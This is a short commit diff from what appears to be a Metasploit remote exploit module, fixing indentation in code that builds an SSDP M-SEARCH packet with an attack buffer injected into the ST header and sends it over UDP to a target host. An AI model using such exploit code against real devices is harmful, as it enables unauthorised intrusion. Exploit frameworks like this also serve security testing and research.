Fix idents from copypasta
parent
975230c9e7
commit
94953d0450
|
@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
pkt =
|
||||
"M-SEARCH * HTTP/1.1\r\n" +
|
||||
"Host:239.255.255.250:1900\r\n" +
|
||||
"ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3)
|
||||
"Man:\"ssdp:discover\"\r\n" +
|
||||
"MX:3\r\n\r\n"
|
||||
"ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3)
|
||||
"Man:\"ssdp:discover\"\r\n" +
|
||||
"MX:3\r\n"
|
||||
|
||||
print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...")
|
||||
connect_udp
|
||||
|
|
Loading…
Reference in New Issue